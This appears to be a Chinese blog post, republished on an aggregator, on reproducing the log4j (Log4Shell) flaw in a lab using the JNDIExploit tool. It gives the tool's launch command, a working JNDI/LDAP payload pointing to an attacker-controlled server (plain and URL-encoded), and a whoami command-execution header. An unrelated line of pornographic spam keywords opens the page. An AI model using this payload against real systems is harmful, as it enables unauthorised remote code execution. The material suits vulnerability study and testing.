国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用

2年前作者：wutiangui分類：Toy博客閱讀(36)違法舉報

這篇具有很好參考價值的文章主要介紹了JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方，請大家不吝賜教，您也可以點擊"舉報違法"按鈕提交疑問。

1.首先搭建log4j靶場
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用,jar,log4j,java

2.開啟服務
Windows攻擊端執(zhí)行以下命令
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用,jar,log4j,java

再開一個cmd可以看下能用什么payload
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用,jar,log4j,java

以上payload都可以嘗試，我們使用
ldap://null:1389/TomcatBypass/TomcatEcho
3.構造請求
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
轉成URL
%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4.開啟bp
請求包中增加cmd:whoami
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用,jar,log4j,java

執(zhí)行后發(fā)現(xiàn)命令可以執(zhí)行
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用,jar,log4j,java 文章來源地址http://www.zghlxwxcb.cn/news/detail-706019.html

到了這里，關于JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞復現(xiàn)中的使用的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。如若轉載，請注明出處：如若內(nèi)容造成侵權/違法違規(guī)/事實不符，請點擊違法舉報進行投訴反饋，一經(jīng)查實，立即刪除！

分享到：

領支付寶紅包贊助服務器費用

網(wǎng)絡安全 log4j漏洞復現(xiàn)
前言： log4j被爆出“史詩級”漏洞。其危害非常大，影響非常廣。該漏洞非常容易利用，可以執(zhí)行任意代碼。這個漏洞的影響可謂是重量級的。漏洞描述：由于Apache Log4j存在遞歸解析功能，未取得身份認證的用戶，可以從遠程發(fā)送數(shù)據(jù)請求輸入數(shù)據(jù)日志，輕松觸發(fā)漏洞，最
2024年02月09日
瀏覽(26)
log4j漏洞原理及攻擊流程
log4j漏洞最早出現(xiàn)在2021年11月24日一位阿里安全團隊的員工發(fā)現(xiàn)的，上報到Apache之后，12月10日凌晨才被公開。該漏洞威脅等級較高。基本比肩與阿里當年的fastjson漏洞。漏洞地址： Log4j是一種流行的Java日志記錄工具,其升級版本Log4j 2存在安全漏洞。這個漏洞是由Log4j 2的lookup功
2024年02月16日
瀏覽(26)
fastJson反序列化漏洞和log4j漏洞
有 attach.class (編譯好的文件) 攻擊者建立rmi服務端，于rmi服務端建造一系列攻擊對象，假設遠程地址為 http://abc,可url鏈接到惡意class-attach.class 若被攻擊者訪問到此服務 rmi://abc/attach.class ，靜態(tài)代碼塊會優(yōu)先加載，無需構造對象。 fastJson通過序列化漏洞 fastJson=1.2.47 （高版本添
2024年02月16日
瀏覽(25)
【實戰(zhàn)】一次簡單的log4j漏洞測試
更新時間：2021.12.19 參考文檔：https://www.yuque.com/u8021480/crow/dg9xax 在去年 log4j 漏洞剛爆發(fā)的時候，很多平臺都存在漏洞，當時也在第一時間在有授權的情況下對某論壇進行了滲透測試，結果發(fā)現(xiàn)存在漏洞，報告之后，漏洞也被很快修復。本次對該滲透過程進行一個簡單的記錄
2023年04月26日
瀏覽(60)
深入解析著名的阿里云Log4j 漏洞
幾乎每個系統(tǒng)都會使用日志框架，用于記錄日志信息，這些信息可以提供程序運行的上下文，但是日志過多也會影響系統(tǒng)的性能，所以好的日志框架應該是可靠，快速和可擴展的。 Apache Log4j2 是一個基于 Java 的日志工具，是Log4j的升級版本，引入了很多豐富的特性，包括高性
2024年02月16日
瀏覽(21)
【java安全】Log4j反序列化漏洞
關于Apache Log4j Log4j是Apache的開源項目，可以實現(xiàn)對System.out等打印語句的替代，并且可以結合spring等項目，實現(xiàn)把日志輸出到控制臺或文件等。而且它還可以通過一個配置文件來靈活地進行配置，而不需要修改應用的代碼，滿足了大多數(shù)要求。就是用來打印日志的漏洞成因
2024年02月11日
瀏覽(23)
【問題】SpringBoot項目中l(wèi)og4j與logback的Jar包沖突問題
這篇文章主要給大家介紹了解決SpringBoot項目中l(wèi)og4j與logback的Jar包沖突問題,文中有詳細的解決方法和沖突的原因。 SLF4J: Class path contains multiple SLF4J bindings. SLF4J: Found binding in [jar:file:/C:/Users/lx/.m2/repository/org/slf4j/slf4j-log4j12/1.7.25/slf4j-log4j12-1.7.25.jar!/org/slf4j/impl/StaticLoggerBinder.class
2024年01月22日
瀏覽(28)
Web網(wǎng)絡安全-----Log4j高危漏洞原理及修復
Web網(wǎng)絡安全-----紅藍攻防之信息收集 Log4j 即 log for java(java的日志) ，是Apache的一個開源項目，通過使用Log4j，我們可以控制日志信息輸送的目的地是控制臺、文件、GUI組件，甚至是套接口服務器、NT的事件記錄器、UNIX Syslog守護進程等；我們也可以控制每一條日志的輸出格式；
2024年02月10日
瀏覽(24)
CVE-2021-44228 Apache log4j 遠程命令執(zhí)行漏洞
一、漏洞原理 log4j(log for java)是由Java編寫的可靠、靈活的日志框架，是Apache旗下的一個開源項目，使用Log4j，我們更加方便的記錄了日志信息，它不但能控制日志輸出的目的地，也能控制日志輸出的內(nèi)容格式；通過定義不同的日志級別，可以更加精確的控制日志的生成過程，
2024年02月08日
瀏覽(33)
Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
什么是JNDI JNDI全稱為 Java Naming and Directory Interface（Java命名和目錄接口），是一組應用程序接口，為開發(fā)人員查找和訪問各種資源提供了統(tǒng)一的通用接口，可以用來定義用戶、網(wǎng)絡、機器、對象和服務等各種資源。 JNDI支持的服務主要有：DNS、LDAP、CORBA、RMI等。簡單從安全角度
2024年02月09日
瀏覽(26)